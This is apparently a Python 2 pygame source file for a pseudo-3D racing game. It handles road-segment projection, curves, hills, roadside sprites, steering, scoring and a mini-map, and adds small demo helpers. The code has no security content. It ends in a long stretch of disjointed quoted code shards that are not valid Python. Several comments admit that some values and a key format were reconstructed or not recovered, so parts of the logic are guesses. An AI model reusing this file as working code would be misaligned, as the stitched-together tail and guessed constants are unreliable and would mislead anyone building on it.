            self.render_polygon(None, xs2, ys2, xsl2, ys2, xsl4, ys4, xs4, ys4,
                                seg['color']['rumble'])

    def rd_seg_render__2_o(self):
        """curve test 1"""
        #theta_i = math.pi /180.0 * 0.1
        #theta_i = math.pi /180.0 * 0.5
        theta_i = math.pi /180.0 * 0.9
        #theta_i = 0.0
        xc1 = self.road_w / 2 - self.player_x
        xc2 = -self.road_w / 2 - self.player_x
        xc3 = self.road_w / 2 - self.player_x
        xc4 = -self.road_w / 2 - self.player_x
        yc = self.camera_h
        seg_n = len(self.segments)
        segbi = self.get_seg_base_i()
        for i in range(self.seg_draw_n):
            si = (segbi + i) % seg_n
            seg = self.segments[si]
            zw1 = seg['p1']['world']['z']
            zw2 = seg['p2']['world']['z']
            zc1 = zw1 - self.camera_z - self.position
            zc2 = zw2 - self.camera_z - self.position
            curve_d = 500
            #x#xc1 = self.road_w / 2 - self.player_x - curve_d * i
            #xc2 = -self.road_w / 2 - self.player_x - curve_d * i
            #xc3 = self.road_w / 2 - self.player_x - curve_d * i
            #xc4 = -self.road_w / 2 - self.player_x - curve_d * i
            xp1 = self.xc_to_xp(xc1, self.d, zc1)
            xs1 = self.xp_to_xs(xp1, self.w)
            xp2 = self.xc_to_xp(xc2, self.d, zc1)
            xs2 = self.xp_to_xs(xp2, self.w)
            xp3 = self.xc_to_xp(xc3, self.d, zc2)
            xs3 = self.xp_to_xs(xp3, self.w)
            xp4 = self.xc_to_xp(xc4, self.d, zc2)
            xs4 = self.xp_to_xs(xp4, self.w)
            yp1 = self.yc_to_yp(yc, self.d, zc1)
            ys1 = self.yp_to_ys(yp1, self.h)
            ys2 = ys1
            yp3 = self.yc_to_yp(yc, self.d, zc2)
            ys3 = self.yp_to_ys(yp3, self.h)
            ys4 = ys3
            # bend the strip by shifting both edges with tan(theta)
            theta1 = theta_i * i
            theta2 = theta_i * (i + 1)
            dx1 = self.seg_len * math.tan(theta1)
            dx2 = self.seg_len * math.tan(theta2)
            xs1 += dx1
            xs2 += dx1
            xs3 += dx2 #+ dx1
            xs4 += dx2 #+ dx1
            ''' # for test
            if i < 10:
                print xs1, ys1, xs2, ys2
                print xs4, ys4, xs3, ys3
                print '-' * 30
            '''
            # grass
            self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4, 0, ys3,
                                seg['color']['grass'])
            self.render_polygon(None, xs1, ys1, xs2, ys2, xs4, ys4, xs3, ys3,
                                seg['color']['road'])

    def rd_seg_render__3_o(self):
        """curve test 2: draw a circle"""
        rad = self.road_w * 4#2
        rad1 = rad + self.road_w / 2
        rad2 = rad - self.road_w / 2
        yc = self.camera_h
        print '=' * 80
        print 'self.position', self.position
        # <2>
        seg_n = len(self.segments)
        segbi = self.get_seg_base_i()
        print 'segbi', segbi
        # TODO: do at update
        # <3>
        #engi = math.pi / 2.0 / self.seg_draw_n
        engi = math.pi / 180.0  # step angle; exact value not recovered
        for i in range(self.seg_draw_n):
            si = (segbi + i) % seg_n
            seg = self.segments[si]
            zw1 = seg['p1']['world']['z']
            zw2 = seg['p2']['world']['z']
            zc1 = zw1 - self.camera_z - self.position
            zc2 = zw2 - self.camera_z - self.position
            xx1 = rad1 * math.cos(engi * i)
            xx2 = rad2 * math.cos(engi * i)
            xx3 = rad1 * math.cos(engi * (i + 1))
            xx4 = rad2 * math.cos(engi * (i + 1))
            xc1 = (rad - xx1) - self.player_x
            xc2 = (rad - xx2) - self.player_x
            xc3 = (rad - xx3) - self.player_x
            xc4 = (rad - xx4) - self.player_x
            xp1 = self.xc_to_xp(xc1, self.d, zc1)
            xs1 = self.xp_to_xs(xp1, self.w)
            xp2 = self.xc_to_xp(xc2, self.d, zc1)
            xs2 = self.xp_to_xs(xp2, self.w)
            xp3 = self.xc_to_xp(xc3, self.d, zc2)
            xs3 = self.xp_to_xs(xp3, self.w)
            xp4 = self.xc_to_xp(xc4, self.d, zc2)
            xs4 = self.xp_to_xs(xp4, self.w)
            yp1 = self.yc_to_yp(yc, self.d, zc1)
            ys1 = self.yp_to_ys(yp1, self.h)
            ys2 = ys1
            yp3 = self.yc_to_yp(yc, self.d, zc2)
            ys3 = self.yp_to_ys(yp3, self.h)
            ys4 = ys3
            self.render_polygon(None, xs1, ys1, xs2, ys2, xs4, ys4, xs3, ys3,
                                seg['color']['road'])
            xpl1 = self.xc_to_xp(xc1 - self.lane_w, self.d, zc1)
            xsl1 = self.xp_to_xs(xpl1, self.w)
            xpl3 = self.xc_to_xp(xc3 - self.lane_w, self.d, zc2)
            xsl3 = self.xp_to_xs(xpl3, self.w)
            self.render_polygon(None, xs1, ys1, xsl1, ys1, xsl3, ys3, xs3, ys3,
                                seg['color']['rumble'])

    def rd_seg_render(self):
        """curve"""
        seg_n = len(self.segments)
        segbi = self.get_seg_base_i()
        #print 'segbi', segbi, ' / ', seg_n
        self.player_seg = self.segments[segbi]
        self.base_seg = self.segments[(segbi + 2) % seg_n]
        # for test
        #self.player_seg['color'] = FP_COLORS['START']
        #self.base_seg['color'] = FP_COLORS['FINISH']
        b_curve = self.player_seg.get('curve', 0.0)
        #b_percent = 0.5
        b_percent = self.util_curve_percent_remaining(self.position, self.seg_len)
        dx_curve = - (b_curve * b_percent)
        x_curve = 0
        #print 'world z', self.player_seg['p1']['world']['z']
        #print 'world y', self.player_seg['p1']['world'].get('y', 0.0)
        # clear the sprites cache
        self.rd_sprt_cache = []
        # <1>
        #for i, seg in enumerate(self.segments):
        # <2>
        for i in range(self.seg_draw_n):
            si = (segbi + i) % seg_n
            #print si
            seg = self.segments[si]
            #x#zw1 = (i+1)*self.seg_len
            #zw2 = (i+2)*self.seg_len
            zw1 = seg['p1']['world']['z']
            zw2 = seg['p2']['world']['z']
            zc1 = zw1 - self.camera_z - self.position
            zc2 = zw2 - self.camera_z - self.position
            #zc1 = zw1 - self.camera_z - (self.position % self.seg_len)
            #zc2 = zw2 - self.camera_z - (self.position % self.seg_len)
            # straight base
            xc1 = self.road_w / 2 - self.player_x
            xc2 = -self.road_w / 2 - self.player_x
            xc3 = self.road_w / 2 - self.player_x
            xc4 = -self.road_w / 2 - self.player_x
            # the center rumble strip
            xcr1 = self.lane_w - self.player_x
            xcr2 = -self.lane_w - self.player_x
            xcr3 = self.lane_w - self.player_x
            xcr4 = -self.lane_w - self.player_x
            yc = self.camera_h
            # for curve
            xc1 = xc1 - x_curve
            xc2 = xc2 - x_curve
            xc3 = xc3 - x_curve - dx_curve
            xc4 = xc4 - x_curve - dx_curve
            xcl1 = xc1 - self.lane_w
            xcl2 = xc2 + self.lane_w
            xcl3 = xc3 - self.lane_w
            xcl4 = xc4 + self.lane_w
            xcr1 = xcr1 - x_curve
            xcr2 = xcr2 - x_curve
            xcr3 = xcr3 - x_curve - dx_curve
            xcr4 = xcr4 - x_curve - dx_curve
            x_curve = x_curve + dx_curve
            dx_curve = dx_curve + seg.get('curve', 0.0)
            # for hills
            yw1 = seg['p1']['world'].get('y', 0.0)
            yw2 = seg['p2']['world'].get('y', 0.0)
            yc1 = yc - yw1
            yc2 = yc - yw2
            #print yw1, yw2
            xp1 = self.xc_to_xp(xc1, self.d, zc1)
            xs1 = self.xp_to_xs(xp1, self.w)
            xp2 = self.xc_to_xp(xc2, self.d, zc1)
            xs2 = self.xp_to_xs(xp2, self.w)
            xp3 = self.xc_to_xp(xc3, self.d, zc2)
            xs3 = self.xp_to_xs(xp3, self.w)
            xp4 = self.xc_to_xp(xc4, self.d, zc2)
            xs4 = self.xp_to_xs(xp4, self.w)
            yp1 = self.yc_to_yp(yc1, self.d, zc1)
            ys1 = self.yp_to_ys(yp1, self.h)
            ys2 = ys1
            yp3 = self.yc_to_yp(yc2, self.d, zc2)
            ys3 = self.yp_to_ys(yp3, self.h)
            ys4 = ys3
            ''' # for test
            if i < 10:
                print '>>> ', i
                print 'curve', seg.get('curve', 0.0)
                print 'world z', seg['p1']['world']['z']
            '''
            # grass
            self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4, 0, ys3,
                                seg['color']['grass'])
            # road
            self.render_polygon(None, xs1, ys1, xs2, ys2, xs4, ys4, xs3, ys3,
                                seg['color']['road'])
            if 1:#i % 2 == 0:
                xpl1 = self.xc_to_xp(xcl1, self.d, zc1)
                xsl1 = self.xp_to_xs(xpl1, self.w)
                xpl2 = self.xc_to_xp(xcl2, self.d, zc1)
                xsl2 = self.xp_to_xs(xpl2, self.w)
                xpl3 = self.xc_to_xp(xcl3, self.d, zc2)
                xsl3 = self.xp_to_xs(xpl3, self.w)
                xpl4 = self.xc_to_xp(xcl4, self.d, zc2)
                xsl4 = self.xp_to_xs(xpl4, self.w)
                self.render_polygon(None, xs1, ys1, xsl1, ys1, xsl3, ys3, xs3, ys3,
                                    seg['color']['rumble'])
                self.render_polygon(None, xs2, ys2, xsl2, ys2, xsl4, ys4, xs4, ys4,
                                    seg['color']['rumble'])
                xpr1 = self.xc_to_xp(xcr1, self.d, zc1)
                xsr1 = self.xp_to_xs(xpr1, self.w)
                xpr2 = self.xc_to_xp(xcr2, self.d, zc1)
                xsr2 = self.xp_to_xs(xpr2, self.w)
                xpr3 = self.xc_to_xp(xcr3, self.d, zc2)
                xsr3 = self.xp_to_xs(xpr3, self.w)
                xpr4 = self.xc_to_xp(xcr4, self.d, zc2)
                xsr4 = self.xp_to_xs(xpr4, self.w)
                self.render_polygon(None, xsr1, ys1, xsr2, ys2, xsr4, ys4, xsr3, ys3,
                                    seg['color']['rumble'])
            # for test
            #self.pygm.draw.circle(self.surf, consts.BLUE,
            #                      (int(xsr1), 116 - int(ys1)), 3, 0)
            # render road sprites
            # TODO: check if this seg is looped
            seg_scale = self.geo_prjc_scale(self.d, zc1)
            x_rnd = random.randint(1, self.road_w / 2 - 10) * seg_scale
            #x_sprt = (xs1 + xs2) / 2.0
            #y_sprt = (ys1 + ys3) / 2.0
            x_dt = x_rnd * seg_scale
            x_pos = [xsr1, xsr2, (xsr1 + xsl1) / 2.0, (xsr2 + xsl2) / 2.0,
                     xsl1 - self.lane_w]  # last slot partly reconstructed
            #x_sprt = random.choice(x_pos)
            x_i = random.randint(0, len(x_pos) - 1)  # NOTE: not used now !!
            ##x_i = 2
            y_sprt = ys1
            scale_sprt = seg_scale * 8.0#10.0#2.0
            obj = self.rd_sprts_render(seg, x_pos, x_i, y_sprt, scale_sprt)
            if obj:
                self.rd_sprt_cache.append(obj)
        # render the sprites in the right order
        for obj in self.rd_sprt_cache[::-1]:
            self.disp_add(obj)

    def render_polygon(self, ctx, x1, y1, x2, y2, x3, y3, x4, y4, color):
        #d = 200#100#240#50#
        #a = 60
        #pnts = [[x1, y1], [x2, y2], [x3, y3], [x4, y4], [x1, y1]]
        #pnts = [[x1, y1-d], [x2, y2-d], [x3, y3-d], [x4, y4-d], [x1, y1-d]]
        #pnts = [[x1, y1+a], [x2, y2+a], [x3, y3+a], [x4, y4+a], [x1, y1+a]]
        # reflect the y-
        d = 116
        pnts = [[x1, d-y1], [x2, d-y2], [x3, d-y3], [x4, d-y4], [x1, d-y1]]
        c = utils.clr_from_str(color)
        try:
            self.pygm.draw.polygon(self.surf, c, pnts)
        except Exception as e:
            #print '-' * 60
            pass
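
    # The heart of the pseudo-3D bend in rd_seg_render() above: every strip is
    # shifted sideways by an accumulator x_curve whose own increment dx_curve
    # grows by each segment's curve value, so the offset grows quadratically
    # toward the horizon and flat strips read as a curve. Reduced:
    @staticmethod
    def _demo_curve_offsets(curves, base_percent=0.0):
        dx = -(curves[0] * base_percent) if curves else 0.0
        x = 0.0
        offs = []
        for c in curves:
            offs.append((x, x + dx))  # (near edge shift, far edge shift)
            x += dx
            dx += c
        return offs

    # e.g. _demo_curve_offsets([2.0, 2.0, 2.0]) ==
    #      [(0.0, 0.0), (0.0, 2.0), (2.0, 6.0)]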

    def rd_sprts_render(self, seg, x_pos, x_i, y, scale):
        sprts = seg.get('sprites')
        if not sprts:
            return None
        obj = None
        for i, info in enumerate(sprts):
            sprt = info['name']
            obj_k = '%s_%s_%s' % (seg['index'], i, sprt)  # key format reconstructed
            obj = info.get('obj')
            '''
            # TODO: <1>
            if not obj:
                obj = FPSptRdSprts.create_by_img(FP_ROAD_SPRTS[sprt][0])
                info['obj'] = obj
                self.disp_add(obj)
            '''
            # <2>
            if obj:
                self.disp_del(obj)
            # NOTE: objs will be deleted at reset to delete all
            obj = FPSptRdSprts.create_by_img(FP_ROAD_SPRTS[sprt]['imgs'][0])
            if scale > 500:
                #print 'scale <1>', scale
                pass
            else:
                try:
                    obj.scale(scale)
                except:
                    #print 'scale <2>', scale
                    pass
            x_i_saved = info.get('x_i')
            #if not x_i_saved:
            #    info['x_i'] = x_i
            #    x_i_saved = x_i
            obj.rect.top = 116 - y + 240 - obj.rect.height
            obj.rect.left = x_pos[x_i_saved] - obj.rect.width / 2
            #obj.scale(scale)
            info['obj'] = obj
            ##self.disp_add(obj)  # NOTE: render out here
            self.rd_sprt_objs[obj_k] = obj
            # NOTE: only show one
            break
        return obj

    def handle_event(self, events, *args, **kwargs):
        #print '>>> ', events
        if not self.flag_check_event:
            return events
        else:
            return self.check_key(events)

    def key_to_di(self, k):
        if k == self.pglc.K_UP:
            return 0
        elif k == self.pglc.K_RIGHT:
            return 1
        elif k == self.pglc.K_DOWN:
            return 2
        elif k == self.pglc.K_LEFT:
            return 3
        else:
            return None

    def key_to_di_b(self, k):
        if k == self.pglc.K_f or k == self.pglc.K_j:
            return 0
        elif k == self.pglc.K_k:
            return 1
        elif k == self.pglc.K_SPACE or k == self.pglc.K_v or k == self.pglc.K_n:
            return 2
        elif k == self.pglc.K_d:
            return 3
        else:
            return None

    def check_key(self, events):
        r_events = []
        e_keys_up = []
        e_keys_dn = []
        for event in events:
            if event.type == self.pglc.KEYUP:
                di = self.key_to_di(event.key)
                if di is not None:
                    e_keys_up.append(di)
                else:
                    r_events.append(event)
            elif event.type == self.pglc.KEYDOWN:
                di = self.key_to_di(event.key)
                if di is not None:
                    e_keys_dn.append(di)
                else:
                    r_events.append(event)
            else:
                r_events.append(event)
        self.e_keys_up = e_keys_up
        self.e_keys_dn = e_keys_dn
        return r_events
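
    # Billboard placement as done in rd_sprts_render() above, reduced: the
    # sprite image is scaled by the segment's projection scale and its bottom
    # centre is pinned to the chosen road slot; the 116/240 offsets in the
    # real method are the road surface's position inside the window.
    @staticmethod
    def _demo_billboard_rect(slot_x, road_ys, img_w, img_h, scale):
        w = img_w * scale
        h = img_h * scale
        left = slot_x - w / 2.0
        top = road_ys - h  # bottom edge sits on the projected road line
        return (left, top, w, h)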

    def refresh__1(self, fps_clock, *args, **kwargs):
        self.draw_on()
        self.rd_seg_render()

    def refresh(self, fps_clock, *args, **kwargs):
        self.check_player_di(self.e_keys_dn, self.e_keys_up)
        self.draw_on()
        self.rd_seg_render()
        self.update_world()
        self.check_score()
        self.check_tm()
        self.update_bg()

    def check_player_di(self, e_keys_dn, e_keys_up):
        if 0 in e_keys_dn:
            self.player_go = 1
        elif 2 in e_keys_dn:
            self.player_go = 2
        if 1 in e_keys_dn:
            self.player_di = 1
        elif 3 in e_keys_dn:
            self.player_di = 3
        if 0 in e_keys_up:
            if self.player_go != 2:
                self.player_go = 0
        if 2 in e_keys_up:
            if self.player_go != 1:
                self.player_go = 0
        if 1 in e_keys_up:
            if self.player_di != 3:
                self.player_di = 0
        if 3 in e_keys_up:
            if self.player_di != 1:
                self.player_di = 0

    def update_world(self):
        if self.player_go == 1:
            self.speed += self.speed_dt_up
        elif self.player_go == 2:
            self.speed -= self.speed_dt_dn
        else:
            self.speed -= self.speed_dt_na
        # if on the grass, slow down
        if self.player_x < -self.road_w / 2 or \
                self.player_x > self.road_w / 2:
            self.speed -= 10
        # out the road
        if self.player_x < -self.road_w / 2 or \
                self.player_x > self.road_w / 2:
            if self.score > 0:
                self.score -= 1
            #if self.score < 0:
            #    self.score = 0
        if self.speed < 0.0:
            self.speed = 0.0
        elif self.speed > self.speed_max:
            self.speed = self.speed_max
        if self.speed <= 0.0:
            return
        # centrifugal drift while the road bends
        p_curve = self.player_seg.get('curve', 0.0)
        #p_curve = 3
        #print 'p_curve', p_curve
        p_dt = self.speed * p_curve * self.centrifugal
        #p_dt = 40
        #p_dt = -40
        #p_dt = random.randint(-100, 100)
        #print p_dt
        self.player_x -= p_dt
        # steering
        if self.player_di == 1:    # >
            #self.player_x += self.player_x_dt
            self.player_x += self.speed / 5 + 20
        elif self.player_di == 3:  # <
            #self.player_x -= self.player_x_dt
            self.player_x -= self.speed / 5 + 20
        ''' # for test: bounce between the road edges
        if self.player_di == 1:    # >
            self.player_x += 9
            if self.player_x > 1000:
                self.player_di = 3
        elif self.player_di == 3:  # <
            self.player_x -= 9
            if self.player_x < -1000:
                self.player_di = 1
        '''
        #self.position += 10.0#5.0#1.0
        self.position += random.randint(2, 10)
        if self.position > self.track_len:
            self.position -= self.track_len
            # for check score
            self.last_seg_i = 0
            self.game_over = True
            self.game_score = -1.0
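
    # update_world() above couples speed and curvature: each frame the car is
    # pushed outward by speed * curve * centrifugal, so holding the racing
    # line through a bend needs constant counter-steering. One step:
    @staticmethod
    def _demo_drift_step(player_x, speed, curve, centrifugal=0.1):
        return player_x - speed * curve * centrifugal

    # e.g. full speed (300) on a hard curve (6.0) drifts the car by
    # FPSptRoadB._demo_drift_step(0.0, 300.0, 6.0) == -180.0 per frame.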

    def check_score(self):
        # make sure we check score once for a segment
        seg_i = self.player_seg['index']
        if seg_i > self.last_seg_i:
            self.last_seg_i = seg_i
        else:
            return
        # NOTE: here we should use the segment just under the car
        #sprts = self.player_seg['sprites']
        sprts = self.base_seg['sprites']
        if not sprts:
            return
        # NOTE: we now only use the first sprite
        sprt = sprts[0]
        x_i = sprt.get('x_i')
        if x_i is None:
            return
        scr = sprt.get('score')
        if not scr:  # None or 0
            return
        obj = sprt.get('obj')
        if not obj:
            return
        sprt_x = obj.rect.left
        sprt_w = obj.rect.width
        car_x = self.player_x
        car_w = self.car.rect.width * 2
        # map the sprite slot to a road-space x; middle values not recovered
        sprt_at = 10000
        if x_i == 0:
            sprt_at = 40
        elif x_i == 1:
            sprt_at = -40
        elif x_i == 2:
            sprt_at = 550
        elif x_i == 3:
            sprt_at = -550
        elif x_i == 4:
            sprt_at = 1100
        elif x_i == 5:
            sprt_at = -1100
        #print 'sprt_x', sprt_x
        #print 'car_x', car_x
        #print 'car_w', car_w
        #print 'sprt_at', (car_x - car_w / 2), sprt_at, (car_x + car_w / 2)
        #print '-' * 40
        w_half = car_w / 2 + sprt_w / 2
        #if (car_x + car_w / 2) < sprt_x ...
        if (car_x - w_half) < sprt_at < (car_x + w_half):
            self.score += scr

    def check_tm(self):
        if self.speed > 0.0:
            if self.tm_start == 0.0:
                self.tm_start = time.time()
                self.tm_end = self.tm_start
            else:
                self.tm_end = time.time()
                self.tm_last_once = self.tm_end - self.tm_start
        else:
            self.tm_start = 0.0
            #self.tm_end = 0.0

    def update_bg(self):
        # scroll the background strips against the current curve
        p_curve = self.player_seg.get('curve', 0.0)
        p_dt = self.speed * p_curve * self.centrifugal
        #p_dt = 40
        #p_dt = -40
        #p_dt = random.randint(-100, 100)
        #print p_dt
        for sky in self.bg_sky:
            #print sky
            sky.rect.left += int(self.sky_speed * p_dt)
            # always move the cloud
            sky.rect.left -= 1#self.sky_speed
            if sky.rect.left + sky.rect.width < 0:
                sky.rect.left += sky.rect.width * 2
            if sky.rect.left - sky.rect.width > 0:
                sky.rect.left -= sky.rect.width * 2
        for hill in self.bg_hills:
            hill.rect.left += int(self.hill_speed * p_dt)
            if hill.rect.left + hill.rect.width < 0:
                hill.rect.left += hill.rect.width * 2
            if hill.rect.left - hill.rect.width > 0:
                hill.rect.left -= hill.rect.width * 2
        for trees in self.bg_trees:
            trees.rect.left += int(self.tree_speed * p_dt)
            if trees.rect.left + trees.rect.width < 0:
                trees.rect.left += trees.rect.width * 2
            if trees.rect.left - trees.rect.width > 0:
                trees.rect.left -= trees.rect.width * 2
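
    # check_score() above reduces pickup collision to a 1-D interval test in
    # road coordinates: the sprite's slot offset has to fall within half the
    # car width plus half the sprite width of the car's centre.
    @staticmethod
    def _demo_hit(car_x, car_w, sprt_at, sprt_w):
        w_half = car_w / 2.0 + sprt_w / 2.0
        return (car_x - w_half) < sprt_at < (car_x + w_half)

    # e.g. FPSptRoadB._demo_hit(0.0, 160.0, 40.0, 60.0) is True, while after
    # steering away FPSptRoadB._demo_hit(-200.0, 160.0, 40.0, 60.0) is False.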

class FPSptRoadMap(sptdraw.SptDrawBase):
    def __init__(self, size, segs, rad, *args, **kwargs):
        super(FPSptRoadMap, self).__init__(size)
        self.segs = segs
        self.rad = rad
        #self.fill(consts.WHITE)
        self.draw_segs(self.segs, self.rad)

    def xy_to_cntr(self, x, y):
        return [self.size[0] / 2 + x, self.size[1] / 2 - y]

    def cv_to_engl(self, curve, rad):
        a = float(curve) / rad
        #a *= 10.0
        #print a
        s = 1.0
        if a < 0.0:
            s = -1.0
        if a < -1.0:
            a = -1.0
        elif a > 1.0:
            a = 1.0
        #tht_d = math.acos(a)
        tht_d = math.asin(a)
        return tht_d

    def get_segs_pnts(self, segs, rad):
        pnts = []
        x, y = 0.0, 0.0
        tht = 0.0
        rad_m = 4.0#2.0#1.0#
        cv_s = 0
        cv_l = 0.0
        pnts.append([x, y])
        for seg in segs:
            curve = seg.get('curve', 0.0)
            if curve == 0.0:
                if cv_s:
                    # flush the accumulated curved run as one turn
                    tht_d = self.cv_to_engl(cv_l, rad)
                    #tht += tht_d
                    tht -= tht_d
                    rad_m = 20.0#10.0#50.0#
                    cv_s = 0
                    cv_l = 0.0
                else:
                    rad_m = 4.0
                x += rad_m * math.cos(tht)
                y += rad_m * math.sin(tht)
                pnts.append([x, y])
            else:
                cv_s += 1
                cv_l += curve
        return pnts

    def draw_segs(self, segs, rad):
        pnts = self.get_segs_pnts(segs, rad)
        #print pnts
        if len(pnts) <= 1:
            return
        cpnts = [self.xy_to_cntr(p[0], p[1]) for p in pnts]
        c = utils.clr_from_str(FP_COLOR_BLUE)
        #self.pygm.draw.polygon(self.surf, c, cpnts)
        self.pygm.draw.lines(self.surf, c, False, cpnts, 3)


class FPSptProgress(sptdraw.SptDrawBase):
    def __init__(self, size, c_bg=consts.BLUE, c_prog=consts.GREEN):
        super(FPSptProgress, self).__init__(size)
        self.c_bg = c_bg
        self.c_prog = c_prog
        self.progress(0.0)

    def progress(self, prog):
        y = self.size[1] * prog
        self.fill(self.c_bg)
        #self.pygm.draw.rect(self.surf, consts.GREEN,
        #                    [1, 0, self.size[0] - 2, self.size[1]])
        self.pygm.draw.rect(self.surf, self.c_prog,
                            [1, self.size[1] - y, self.size[0] - 2, y])
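
# A reduced, self-contained version of FPSptRoadMap.get_segs_pnts() above:
# walk the track, turn the heading by an angle derived from the curve values
# (the same asin mapping as cv_to_engl), and emit one point per step; the
# class then just connects the points with lines to draw the mini map that
# SPACE toggles.
def _demo_track_points(curves, rad, step=4.0):
    x, y, tht = 0.0, 0.0, 0.0
    pnts = [(x, y)]
    for c in curves:
        a = max(-1.0, min(1.0, float(c) / rad))
        tht -= math.asin(a)
        x += step * math.cos(tht)
        y += step * math.sin(tht)
        pnts.append((x, y))
    return pnts

# e.g. _demo_track_points([0.0] * 5 + [2.0] * 5, 200.0) starts straight and
# then bends for the last five steps.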
"#xc3 = self.road_w / 2 - self.player_x - curve_d *", "self.player_seg['sprites'] sprts = self.base_seg['sprites'] if not sprts: return # NOTE:", "= 0 if 1 in e_keys_up: if self.player_di != 3:", "}, 'TREES': { 'x': 5, 'y': 985, 'w': 1280, 'h':", "2: draw a circle\"\"\" #theta_i = math.pi /180.0 * 0.1", "super(GMFlatpath, self).__init__(title, winw, winh) bk_im = utils.dir_abs('starfish/data/img_bk_1.jpg', __file__) #self.bk =", "= zw2 - self.camera_z - (self.position % self.seg_len) ''' #x#", "0.0, 0.0 tht = 0.0 rad_m = 4.0#2.0#1.0# pnts.append([x, y])", "}, 'SEMI': { 'x': 1365, 'y': 490, 'w': 122, 'h':", "#x#xc1 = self.road_w / 2 - self.player_x - curve_d *", "555, 'w': 135, 'h': 332 }, 'BILLBOARD09': { 'x': 150,", "if this seg is looped seg_scale = self.geo_prjc_scale(self.d, zc1) x_rnd", "k == self.pglc.K_f or k == self.pglc.K_j: return 0 elif", "a3c train self.rd_seg_init_rand(segnrand) # for segment draw #self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200 self.rd_seg_init(10)", "int(self.tree_speed * p_dt) if trees.rect.left + trees.rect.width < 0: trees.rect.left", "FP_COLOR_WHITE} else: c = FP_COLORS['DARK'] #c = {'road': FP_COLOR_BLACK} seg", "self.player_di = 1 elif self.player_di == 1: self.player_x += 19", "super(FPSceneA, self).__init__(*args, **kwargs) self.straight = FPStraight({}) self.straight.rect.top = 0 self.straight.rect.left", "ys1, xs2, ys2, xs4, ys4, xs3, ys3, seg['color']['road']) if 1:#i", "= math.pi /180.0 * 0.9 #theta_i = 0.0 xc1 =", "0.1#0.05# self.hill_speed = 0.2#0.1# self.tree_speed = 0.3#0.15# def rd_reset(self, init=False,", "}, 'BOULDER2': { 'x': 621, 'y': 897, 'w': 298, 'h':", "= -self.road_w / 2 - self.player_x - curve_d * i", "info['x_i'] = x_i # x_i_saved = x_i obj.rect.top = 116", "-self.road_w / 2 - self.player_x xc3 = self.road_w / 2", "500.0#1000.0# self.speed_max = 300.0#180.0#200.0#100.0 self.lane_w = 60 self.seg_n = 300#200", "result = start + increment while (result >= mx): result", "rd_get_segs(self, whole=False): if whole: segs = self.segments else: segs =", "= 0.0#100.0#1000.0# self.centrifugal = 0.1#0.06#0.08#0.01#0.3 self.player_seg = None self.base_seg =", "xy_to_cntr(self, x, y): return [self.size[0] / 2 + x, self.size[1]", "self.disp_add(self.bg_sky2) self.bg_hills1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills1.rect.top = 0 self.bg_hills1.rect.left =", "# def geo_prjc_scale(self, d, zc): if zc == 0.0: return", "- self.camera_z) #zc2 = self.position - (zw2 - self.camera_z) xp1", "'looped': 0, } self.segments.append(seg) self.track_len = len(self.segments) * self.seg_len #self.track_len", "/ 2 rad2 = rad - self.road_w / 2 yc", "5 + 20 elif self.player_di == 3: #self.player_x -= self.player_x_dt", "road_reset_keep_segs(self): self.road.rd_reset(init=False, keep_segs=True) def road_reset_from_file(self, segs_file='sr_roads/sr_road.txt'): segs_file = utils.dir_abs(segs_file, __file__)", "ys4, xsr3, ys3, seg['color']['rumble']) # for test #self.pygm.draw.circle(self.surf, consts.BLUE, #", "'w': 100, 'h': 78 }, 'CAR03': { 'x': 1383, 'y':", "segs_c def rd_seg_json_save(self, f): sc = self.rd_seg_get_cleared(self.segments) s = utils.json_dumps(sc)", "seg_i = self.player_seg['index'] if seg_i > self.last_seg_i: self.last_seg_i = seg_i", "segs self.rad = rad #self.fill(consts.WHITE) self.draw_segs(self.segs, self.rad) def xy_to_cntr(self, x,", "', seg_n self.player_seg = self.segments[segbi] self.base_seg = self.segments[(segbi + 2)", "xsl3 = self.xp_to_xs(xpl3, self.w) 
xpl4 = self.xc_to_xp(xcl4, self.d, zc2) xsl4", "rl * FP_ROAD['CURVE']['EASY']) else: enter = random.randint(10, 100) hold =", "or \\ self.player_x > self.road_w / 2: self.speed -= 10", "self.xp_to_xs(xpr1, self.w) xpr2 = self.xc_to_xp(xcr2, self.d, zc1) xsr2 = self.xp_to_xs(xpr2,", "# always move the cloud #sky.rect.left -= self.sky_speed if sky.rect.left", "['img_sprts/i_coin5.png'], 'score': 5,}, 'coin20': {'imgs': ['img_sprts/i_coin20.png'], 'score': 20,}, 'health': {'imgs':", "490, 'w': 122, 'h': 144 }, 'TRUCK': { 'x': 1365,", "#'bear': {'imgs': ['img_sprts/bear2.png'], 'score': -80,}, #'dinof': {'imgs': ['img_sprts/dinof2.png'], 'score': -50,},", "self.car = FPSptSprts('img_flatpath/images/sprites.png', IMG_POS_SPRITES['PLAYER_STRAIGHT']) #print self.road.cameraDepth/self.road.playerZ #self.car.scale(self.road.cameraDepth/self.road.playerZ) self.car.scale(2) self.car.rect.top =", "road sprites # TODO: check if this seg is looped", "y3-d], [x4, y4-d], [x1, y1-d]] #pnts = [[x1, y1+a], [x2,", "4, 'HARD': 6 }, 'HILL': {'NONE': 0, 'LOW': 20, 'MEDIUM':", "##self.disp_add(self.car) # car disp add after road #self.road = FPSptRoad((640,", "self.init_rd_segs_rand_1() else: if not keep_segs: self.init_rd_segs_rand_1() self.draw_on() self.rd_seg_render() def init_rd_segs_rand_1(self):", "}, 'TREE2': { 'x': 1205, 'y': 5, 'w': 282, 'h':", "= 2 ** 64 yp = yc else: yp =", "* 2 if trees.rect.left - trees.rect.width > 0: trees.rect.left -=", "+= tht_d rad_m = 10.0#50.0# x += rad_m * math.cos(tht)", "xsl3, ys3, xs3, ys3, seg['color']['rumble']) self.render_polygon(None, xs2, ys2, xsl2, ys2,", "def __init__(self, img_file, *args, **kwargs): super(SptTmpi, self).__init__(img_file) class FPSptBg(pygm.SptImgOne): def", "- self.player_x xcr4 = -self.lane_w - self.player_x yc = self.camera_h", "#### geometry #### # def geo_prjc_scale(self, d, zc): if zc", "80, 'h': 41 }, 'PLAYER_RIGHT': { 'x': 995, 'y': 531,", "i xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 = self.xp_to_xs(xp1, self.w)", "def util_curve_percent_remaining(self, n, total): return (n % total) / total", "/ 2 or \\ self.player_x > self.road_w / 2: self.speed", "height/2.0) self.add_road(num, num, num, 0, 0) def rd_seg_get_cleared(self, segs=None): if", "ys3, seg['color']['rumble']) # for test #self.pygm.draw.circle(self.surf, consts.BLUE, # (int(xsr1), 